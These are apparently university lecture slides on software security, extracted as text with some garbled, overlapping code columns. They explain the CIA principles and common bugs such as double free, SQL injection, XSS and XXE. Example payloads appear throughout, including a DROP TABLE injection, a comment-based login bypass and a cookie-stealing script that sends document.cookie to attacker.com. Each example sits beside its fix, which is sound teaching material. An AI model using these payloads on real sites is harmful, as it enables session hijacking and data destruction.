Software Security Lecture Notes - Systems and Software Verification Laboratory PDF
Document Details
Uploaded by LavishLosAngeles
The University of Manchester
Lucas Cordeiro
Tags
Summary
These lecture notes cover fundamental concepts of software security, including audience, relationships to other courses, learning outcomes, and the syllabus. Key topics include software security fundamentals and critical software vulnerabilities.
Full Transcript
Systems and Software Verification Laboratory Software Security used by Dr. Bilal Alqudah , AHU Lucas Cordeiro Department of Computer Science luca...
Systems and Software Verification Laboratory Software Security used by Dr. Bilal Alqudah , AHU Lucas Cordeiro Department of Computer Science [email protected] Audience This course unit introduces students to basic and advanced approaches to formally build verified trustworthy software systems Reliability: deliver services as specified Availability: deliver services when requested Safety: operate without harmful states Resilience: transform, renew, and recover in timely response to events Security: remain protected against accidental or deliberate attacks Relationship to Other Courses Software Security involves people and practices, to build software systems, ensuring confidentiality, integrity and availability Cyber-Security Cryptography Automated Reasoning and Verification Logic and Modelling Agile and Test-Driven Development Software Engineering Concepts In Practice Systems Governance Cyber-Security Pathway Cyber-Security Software Security Cryptography Build programs that continue to function System correctly under Governance malicious attack Trustworthy SW Systems Intended Learning Outcomes Explain computer security problem and why broken software lies at its heart Explain continuous risk management and how to put it into practice to ensure software security Introduce security properties into the software development lifecycle Use software V&V techniques to detect software vulnerabilities and mitigate against them Relate security V&V to risk analysis to address continued resilience when a cyber-attack takes place Develop case studies to think like an attacker and mitigate them using software V&V Syllabus Part I: Software Security Fundamentals o Defining a Discipline o A Risk Management Framework o Vulnerability Assessment and Management o Overview on Traffic, Vulnerability and Malware Analysis Syllabus (cont.) Part II: Software Security o Architectural Risk Analysis o Code Inspection for Finding Security Vulnerabilities and Exposures (ref: Mitre’s CVE) o Penetration Testing, Concolic Testing, Fuzzing, Automated Test Generation o Model Checking, Abstract Interpretation, Symbolic Execution o Risk-Based Security Testing and Verification o Software Security Meets Security Operations Syllabus (cont.) Part III: Software Security Grows Up o Withstanding adversarial tactics and techniques defined in Mitre’s ATT&CK™ knowledge base o An Enterprise Software Security Program Textbook McGraw, Gary: Software Security: Building Security In, Addison-Wesley, 2006 Hoglund, Greg: Exploiting Software: How to Break Code, Addison-Wesley, 2004 Ransome, James and Misra, Anmol: Core Software Security: Security at the Source, CRC Press, 2014 Textbook Edmund M. Clark Jr., Orna Grumberg, Daniel Kroening, Doron Peled, Helmut Veith: Model Checking, The MIT Press, 2018 Textbook Edmund M. Clark Jr., Orna Grumberg, Daniel Kroening, Doron Peled, Helmut Veith: Model Checking, The MIT Press, 2018 Mark Dowd , John McDonald, et al.: The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities, Addison-Wesley, 2006 These slides are also based on the lectures notes of “Computer and Network Security” by Dan Boneh and John Mitchell. Software Platform Security https://www.cybok.org/media/downloads/cybok_version_1.0.pdf SEI CERT C Coding Standard: Rules for Developing Safe, Reliable, and Secure Systems Computer Emergency Response Team https://resources.sei.cmu.edu/downloads/secure-coding/ assets/sei-cert-c-coding-standard-2016-v01.pdf The CERT Division CERT’s main goal is to improve the security and resilience of computer systems and networks Computer Emergency Response Team https://www.sei.cmu.edu/about/divisions/cert/ Intended Learning Outcomes Define standard notions of security and use them to evaluate the system’s confidentiality, integrity and availability Explain standard software security problems in real-world applications Use testing and verification techniques to reason about the system’s safety and security Motivating Example void main(){ int x=getPassword(); int getPassword() { ifif(x){ (x!=0){ char buf; printf(“Access Denied\n”); gets(buf); exit(0); return strcmp(buf, ”SMT”); } } printf(“Access Granted\n”); } What happens if the user enters “SMT”? On a Linux x64 platform running GCC 4.8.2, an input consisting of 24 arbitrary characters followed by ], , and @, will bypass the “Access Denied” message A more extended input will run over into other parts of the computer memory Barrett et al., Problem Solving for the 21st Century, 2014. What is Safety and Security? Safety – If the user supplies any input, then the system generates the desired output Any input ⇒ Good output Safe and protected from danger/harm More features leads to a higher verification effort Security – If an attacker supplies unexpected input, then the system does not fail in specific ways Bad input ⇒ Bad output Protection of individuals, organizations, and properties against external threats More features leads to a higher chance of attacks Overview System User Attacker Security consists of the following basic elements: – Honest user (Alice) – Dishonest attacker – Goal: how the attacker disrupts Alice’s use of the system (Integrity, Availability) learns information intended for Alice only (Confidentiality) Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009. Network Security Network Attacker System Intercepts and controls network communication User Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009. Web Security System Web Attacker Sets up a malicious site visited by the victim; there exists no control of the User network Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009. Operating System Security OS Attacker Controls malicious files and applications User Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009. CIA Principle System User Attacker Confidentiality: Attacker does not learn the user’s secrets. Integrity: Attacker does not undetectably corrupt system’s function for the user Availability: Attacker does not keep system from being useful to the user Boneh, D. and Mitchell, J., “Computer and Network Security”, 2009. What does it mean for software to be secure? A software system is secure if it satisfies a specified security objective § E.g. confidentiality, integrity and availability requirements for the system’s data and functionality Example of Social Networking Service Confidentiality: Pictures posted by a user can only be seen by that user’s friends Integrity: A user can like any given post at most once Availability: The service is operational more than 99.9% of the time on average Security Failure and Vulnerabilities A security failure is a scenario where the software system does not achieve its security objective – A vulnerability is the underlying cause of such a failure Most software systems do not have precise, explicit security objectives – These objectives are not absolute – Traded off other objectives e.g. performance or usability Software implementation bugs can lead to a substantial disruption in the behaviour of the software Intended Learning Outcomes Define standard notions of security and use them to evaluate the system’s confidentiality, integrity and availability Explain standard software security problems in real-world applications Use testing and verification techniques to reason about the system’s safety and security Software Security Software security consists of building programs that continue to function correctly under malicious attack Software Requirements Definition Application Availability services are accessible if requested by Firmware authorized users Integrity data completeness OS and accuracy are preserved Services Confidentiality only authorized users can get access Communication to the data Why are there security vulnerabilities? Software is one of the sources of security problems – Why do programmers write insecure code? Awareness is the main issue Some contributing factors – Limited number of courses in computer security – Programming textbooks do not emphasize security – Limited number of security audits – Programmers are focused on implementing features – Security is expensive and takes time – Legacy software (e.g., C is an unsafe language) Implementation Vulnerability We use the term implementation vulnerability (or security bug) both for bugs that – make it possible for an attacker to violate a security objective – for classes of bugs that enable specific attack techniques The Common Vulnerabilities and Exposures (CVE) is a publicly available list of entries – describes vulnerabilities in widely-used software components – it lists close to a hundred thousand such vulnerabilities https://www.cve.org/ https://cve.mitre.org/ Critical Software Vulnerabilities Null pointer dereference double *p = new double(); int main() {! A NULL pointer dereference double *p = NULL; occurs when the application int n = 8;! dereferences a pointer that it for(int i = 0; i < n; ++i ) *(p+i) = i*2;! expects to be valid, but is return 0;! *(p+i) =new double() NULL } Scope Impact Availability Crash, exit and restart Integrity Execute Unauthorized Code Confidentiality or Commands Availability Critical Software Vulnerabilities Null pointer dereference Double free int main(){! The product calls free() char* ptr = (char *)malloc(sizeof(char));! twice on the same if(ptr==NULL) return -1;! memory address, *ptr = 'a’;! free(ptr); leading to modification free(ptr);! of unexpected memory return 0;! locations } Scope Impact Integrity Execute Unauthorized Code Confidentiality or Commands Availability Critical Software Vulnerabilities if (NULL) {. …..}. X if (true) {. …..}. OK Null pointer dereference if (false) {. …..}. Ok Double free if (1) {. …..}. Ok Unchecked Return Value to NULL Pointer Dereference The product does String username = getUserName();! not check for an if (username.equals(ADMIN_USER)) {!...! error after calling a } function that can return with a NULL pointer if the function Scope Impact fails Availability Crash, exit and restart Critical Software Vulnerabilities Null pointer dereference Double free Unchecked Return Value to NULL Pointer Dereference class w{ private: cin >> x; Division by zero int w= R/x; int * ptr; Missing free int * ptr; public: w(){}; …. Use after free free(ptr); ~w(){ delete(ptr); *ptr=20; XXXX APIs rule based checking ….. } ptr= new int(); } Race Condition Vulnerabilities VDU Visual VDU Display Unit VDU VDU Race conditions P P P P occur when multiple processes perform Process unsynchronized accesses to the Database database Race Condition Vulnerabilities Concurrency is an essential subject with importance well beyond the area of cyber-security – Prove program correctness Race condition vulnerabilities are relevant for many different types of software – Race conditions on the file system: privileged programs An attacker can invalidate the condition between the check and action – Races on the session state in web applications: web servers are often multi-threaded Two HTTP requests belonging to the same HTTP session may access the session state concurrently (the corruption of the session state) Web Application Vulnerabilities https://www.imperva.com/blog/the-state-of-web-application- vulnerabilities-in-2018/ Vulnerabilities by Categories Structured output generation vulnerabilities A SQL injection vulnerability is a structured output generation vulnerability where the structured output consists of SQL code – These vulnerabilities are relevant for server-side web app interact with a back-end database by constructing queries based on input provided through web forms A script injection vulnerability, or Cross-Site Scripting (XSS) vulnerability is a structured output generation vulnerability – the structured output is JavaScript code sent to a web browser for client-side execution Sub getstudent ( stNO ){ select student from courses where 1=1; drop table student cascade ;-- > 2000 ; SQL Injection https://www.hacksplaining.com/lessons SQL injection allows an attacker to interfere with the queries to the database in order to retrieve data - retrieving hidden data - subverting application logic - UNION attacks - examining the database - blind SQL injection https://portswigger.net/web-security/sql-injection Example of SQL Injection A programmer can construct a SQL query to check name and password as query = "select * from users where name=’" + name + "’" and pw = ’" + password + "’" However, if an attacker provides the name string, the attacker can set name to “John’ –” – this would remove the password check from the query (note that -- starts a comment in SQL) Cross-site Scripting (XSS) XSS attacks represent injection of malicious scripts into trusted websites... Employee ID: XSS allows attackers to bypass access controls – If eid has a value that includes source code, then the code will be executed by the web browser – use e-mail or social engineering tricks to lead victims to visit a link to another URL XSS XSS stands for Cross-Site Scripting, which is a type of web security vulnerability that allows attackers to inject malicious code into a web page viewed by other users. In an XSS attack, the attacker injects scripts or other code into a web page, which is then executed by the victim's web browser. This can allow the attacker to steal sensitive information, such as login credentials, session tokens, or other personal data. XSS attacks can be classified into two main types: stored (also known as persistent) and reflected (also known as non-persistent). Stored XSS attacks involve injecting malicious code into a web page that is then stored on the server and served to all users who visit the page. Reflected XSS attacks involve injecting code that is then reflected back to the user, such as in a search field or other input form. ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them Example of a web page with a Cross-Site Scripting (XSS) vulnerability in JavaScript The code allows users to input their name, which is then displayed in a greeting message when they click the "Submit" button. XSS Example However, the script does not properly sanitize user input, making it vulnerable to a cross-site scripting attack. Welcome to my website! Enter your name below: Submit An attacker could inject malicious code into the name input field, such as: function greet() { var name = document.getElementById("name").value; document.getElementById("greeting").innerHTML = "Hello, " alert('You have been hacked!') + name + "!"; } ref: https://www.girlscanhack.com/post/breaking-down-the- web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them To fix this vulnerability, the code should properly sanitize user input, such as by using : The FiX A. content security policy or B. validating input on the server-side before displaying it in the HTML. we've added a Content Security Policy XSS Example (CSP) meta tag in the `head` section of the to only allow resources to be loaded from the same origin as the website, preventing any Welcome to my website! external scripts from being loaded. Enter your name below: Submit In addition, we've updated the `greet()` function to sanitize user input before function greet() { displaying it in the greeting message. We've var name = document.getElementById("name").value; used the `replace()` method to replace any `` characters in the user input with their document.getElementById("greeting").innerHTML = "Hello, " + name + "!"; HTML entity equivalents, `<` and `>`, } respectively. ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them XSS can be used by attackers to perform a wide range of malicious activities, including but not limited to: 1. Stealing sensitive information: An attacker can use XSS to steal sensitive data such as login credentials, session tokens, and other personal information that may be present on the web page. 2. Session hijacking: Attackers can use XSS to hijack the victim's session by stealing their session cookies or other session identifiers, which can then be used to impersonate the victim and gain unauthorized access to their account. 3. Delivering malware: Attackers can use XSS to deliver malware to the victim's computer, which can then be used to compromise the system, steal sensitive data, or launch further attacks. 4. Phishing: Attackers can use XSS to create convincing phishing pages that trick users into entering their login credentials or other sensitive information. 5. Defacing websites: Attackers can use XSS to modify the content of a web page, defacing it or inserting malicious links or code. 6. Creating self-propagating worms: In some cases, attackers can use XSS to create self- propagating worms that spread automatically to other users who visit the same web page. ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them Reflected XSS via URL parameter (PHP) To fix this: http://example.com/search?q=alert("XSS"); you should validate and sanitize user input on the server-side. In this case, you should escape any special characters that could be In this example, the q parameter in the URL is used to inject scripts into the vulnerable to a reflected XSS attack. The attacker HTML. You can use an HTML injects a script that displays an alert box with the encoding library, like text "XSS" when the victim clicks on the link. htmlspecialchars(), to do this. $q = htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8'); ref: https://www.girlscanhack.com/post/breaking-down-the-web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them Stored XSS in comment section (HTML) (PHP) require_once 'htmlpurifier- Leave a comment: 4.12.0/library/HTMLPurifier.auto.php'; $config = HTMLPurifier_Config::createDefault(); Submit $comment = $purifier->purify($_POST['comment']); In this example, the text area field is The Fix : vulnerable to a stored XSS attack. An you should sanitize user input before storing attacker could inject a script into the it on the server-side. You can use a library like comment field, which would be htmlpurifier to remove any malicious scripts stored on the server and executed in and tags from the user's input. the victim's browser when they view ref: https://www.girlscanhack.com/post/breaking-down-the- the comment section. web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them DOM-based XSS via JavaScript (HTML) To fix this, you should use proper input var searchResults = document.getElementById("search- validation and sanitization techniques results"); var searchTerm = window.location.search.replace("?q=", ""); to prevent user input from being able searchResults.innerHTML = "Search results for: " + to execute scripts. You can use regular searchTerm + ""; expressions or input validation libraries to ensure that the input is safe. In this example, the searchTerm variable is (Javascript) vulnerable to a DOM-based XSS attack. If an var searchTerm = window.location.search.replace("?q=", ""); attacker is able to inject a script into the q if (/^[a-zA-Z0-9]+$/.test(searchTerm)) { parameter in the URL, it will be executed when searchResults.innerHTML = "Search results for: " + searchTerm + ""; the JavaScript code modifies the content of the } else { searchResults element. searchResults.innerHTML = "Invalid search term."; ref: https://www.girlscanhack.com/post/breaking-down-the- } web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them Stored XSS in form field (HTML) To fix this, you should escape and sanitize Username: user input before storing it on the server- side. You can use an HTML encoding Password: library, like htmlspecialchars(), to do this Login (PHP) In this example, the username field is vulnerable $username = htmlspecialchars($_POST['username'], to a stored XSS attack. An attacker could inject a ENT_QUOTES, 'UTF-8'); script into the username field, which would be stored on the server and executed in the victim's browser when they log in. ref: https://www.girlscanhack.com/post/breaking-down-the- web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them Session hijacking via cookie stealing (HTML) var cookie = document.cookie; To fix this, you should use secure cookies var attackerURL = and HTTPS to prevent session hijacking "http://attacker.com/steal.php?cookie=" + cookie; var img = new Image(); attacks. You can set the HttpOnly and img.src = attackerURL; Secure flags on cookies to prevent them from being accessed by scripts and to ensure that they are only transmitted In this example, an attacker injects a script into over secure connections. a vulnerable website that steals the victim's session cookie. The script creates an image object with the URL of the attacker's server and (PHP) the victim's session cookie as a parameter. session_set_cookie_params( When the victim's browser loads the image, the 0, '/', '', true, true); session cookie is sent to the attacker's server, session_start(); ref: https://www.girlscanhack.com/post/breaking-down-the- allowing them to hijack the victim's session. web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them Resources https://pentest-tools.com/blog/xss-attacks-practical-scenarios to Practice https://github.com/digininja/DVWA Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommended using a virtual machine (such as VirtualBox or VMware), which is set to NAT networking mode. Inside a guest machine, you can download and install XAMPP for the web server and database. Download the website XSS Attack: 3 Real Life Attacks and Code Examples https://brightsec.com/blog/xss-attack/ https://www.websentra.com/cross-site-scripting-attacks-guide-examples/ https://owasp.org/www-community/attacks/xss/ ref: https://www.girlscanhack.com/post/breaking-down-the- web-5-real-life-xss-attacks-how-they-work-and-how-to-fix-them XML External Entity (XXE) Processing XXE represents a malicious action against an application that parses XML input – XXE occurs when XML input (incl. an external entity) is processed by a weakly configured XML parser – XXE might lead to the disclosure of confidential data ]> &xxe; mypass